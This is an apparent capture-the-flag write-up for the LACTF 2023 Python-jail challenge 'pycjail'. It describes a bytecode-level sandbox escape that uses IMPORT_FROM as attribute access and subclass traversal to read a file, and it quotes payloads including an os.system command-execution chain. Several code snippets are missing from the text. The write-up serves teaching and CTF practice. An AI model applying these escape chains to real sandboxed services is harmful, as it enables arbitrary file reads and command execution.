Writeup - Pycjail (LACTF 2023)
- Type - jail
- Name - pycjail
- Points - 495
All of you think you're so cute with your fancy little sandbox bypasses, but jokes on
This challenge required you to bypass a Python jail, which limited several aspects of a custom
code object you created. The source code for the jail is here, or below:
To summarize the code above, you provided the
co_code bytes for a custom
code object that was created and ran. The restrictions imposed were:
- max 3 consts
- max 4 names
- max 15 opcodes
- opcodes can’t be in
['IMPORT_NAME', 'MAKE_FUNCTION', 'STORE_SUBSCR', 'DELETE_SUBSCR', 'LOAD_BUILD_CLASS', 'LOAD_ASSERTION_ERROR', 'STORE_NAME', 'DELETE_NAME', 'STORE_ATTR', 'DELETE_ATTR', 'STORE_GLOBAL', 'DELETE_GLOBAL', 'LOAD_NAME', 'LOAD_ATTR', 'JUMP_FORWARD', 'JUMP_IF_FALSE_OR_POP', 'JUMP_IF_TRUE_OR_POP', 'JUMP_ABSOLUTE', 'POP_JUMP_IF_FALSE', 'POP_JUMP_IF_TRUE', 'LOAD_GLOBAL', 'JUMP_IF_NOT_EXC_MATCH', 'LOAD_FAST', 'STORE_FAST', 'DELETE_FAST', 'LOAD_CLOSURE', 'LOAD_DEREF', 'STORE_DEREF', 'DELETE_DEREF', 'LOAD_CLASSDEREF', 'LOAD_METHOD'](aka no import/makefunc/load/store/delete/jump)
- opcode values can’t be > 3
Nothing about the flag was mentioned, so it was likely in
./flag.txt, or if they were evil they’d require you to get RCE to read the flag. I was banking on the fact that it was stored in
./flag.txt, so my goal was to get arbitrary read.
I made a list of all the Python 3.10 opcodes that were allowed in this jail by pulling from the documentation and removing the opcodes banned in the list above. What caught my eye initially was that the opcodes
CALL_METHOD were not banned, and this is what allows you to call a function on the stack. However, the hard part was getting a callable object on the stack in the first place. The opcodes
LOAD_ATTR are typically used to get a function on the stack, and all
LOAD opcodes were blocked except for
LOAD_CONST (which only allowed us to put strings on the stack). As an example, below shows the bytecode for the line
To test various payloads with the provided
main.py script, I created this small script to give me the info I want:
Based on the provided
code_str, it would show me a disassembly of the code, along with
co_code in the form desired.
Now that I was set up to try stuff, I went through the Python bytecode documentation, opcode by opcode, trying to see if there was anything that would put a callable on the stack. Many of the opcodes were eliminated from the start, such as
CALL_* were going to be useful later on, but wouldn’t help us get a callable onto the stack. After spending about an hour with a teammate looking through the opcodes, we felt like there wasn’t anything there. So we did what anyone would do and asked ChatGPT (no, it wasn’t helpful).
Desparate, we did some more research online with CTF writeups until I came across a write-up by kmh from DiceCTF 2021. The challenge
TI-1337 Plus CE was also a pyjail, and one of the things this user learned was that “
LOAD_ATTR in disguise!”.
IMPORT_FROM was not banned, but we hadn’t paid much attention to it because it always follows (and only functions properly with) the opcode
IMPORT_NAME, which was banned. However, if we could use it to function as
LOAD_ATTR, then that means we could get a callable onto the stack, and through attribute stacking run some code like
"".__class__.__base__.__subclasses__()()._module.__builtins__["eval"]("insert code here").
It was also apparent that since using
IMPORT_FROM in place of
LOAD_ATTR isn’t any default behavior for the Python interpreter, we would have to manually create custom bytecode to be successful. This actually made sense; normally, pyjails just ask for a line of code (single
input() call), but this one had you specify certain parts of the
code object you wanted to create. However, understanding the Python bytecode wouldn’t be typical or even perhaps technically compliant explained the challenge author’s design choice.
Manual testing confirmed our suspicion that
IMPORT_FROM worked as desired, so it was now time to create a payload.
A lot of testing and trial & error was performed at this point to get a payload that would work. Getting the payload
"".__class__.__base__.__subclasses__ to work was fairly simple, however we ran into errors doing
$ python3 main.py
The opcode used above was
CALL_METHOD, so I tried
CALL_FUNCTION and it works! Apparently the two ways for calling functions is by pairing
The next issue we ran into was getting a number on the stack. Because
main.py used the
input() function to get the data, everything was treated as a string. Inserting
1 as a const would always have it render as
'1'. After some research, we settled on the
GET_LEN opcode, which just ran the
len() function on the item on top of the stack. Since our first constant was just an empty string, and the actual value of the string didn’t matter (aka
"abcd".__class__ are the same), we could load that const onto the stack again and run
GET_LEN to put the length of that string onto the stack. We could just set the length of the initial string to whatever we want to obtain the desired integer.
However, a second hiccup was encountered that required 2 additional opcodes to bypass.
GET_LEN pushed the integer we wanted onto the stack, but kept the loaded string on there too, which we didn’t want. I had to insert an extra
POP_TOP opcode to switch the order and remove the string from the opcode.
At this point, the payload we had was:
Python code: 'aaaa...aaa'.__class__.__base__.__subclasses__()
We had 2 consts, 1 name, and 4 opcodes left to get what we wanted, but we had access to an extensive list of classes that opened up functionality a lot.
The “stereotypical” payload from HackTricks is to use
''.__class__.__bases__.__subclasses__()()._module.__builtins__['__import__']('os').system('ls') to run system commands (note that this was slightly modified from the Python2 version, and the exact index of
<class 'warnings.catch_warnings'> may vary depending on your installation & version). The problem with this payload was it required another 3 names (
system) and 3 consts (
'ls'), which we didn’t have. We considered making our first const of length 144 the same as our last const (padding our bash payload with extra
;s until we reached our desired length), but we still had 2 extra names.
Our second thought was
"".__class__.__base__.__subclasses__()()._module.__builtins__["eval"]("insert code here"), but that required 2 names and 2 consts (still 1 too many names).
After perusing the list of available classes one by one, I started looking into the class at index 118, which was
<class '_frozen_importlib_external.FileLoader'>. Looking at this class’s attributes, I saw the function
get_data(), which required two arguments for the path of a file. Excited, I wrote up and tested the code
("a"*118).__class__.__base__.__subclasses__().get_data('flag.txt','flag.txt'), and my local flag was printed! This only required 1 extra name and const (we even had one const leftover), and used exactly 4 more opcodes.
The final payload was: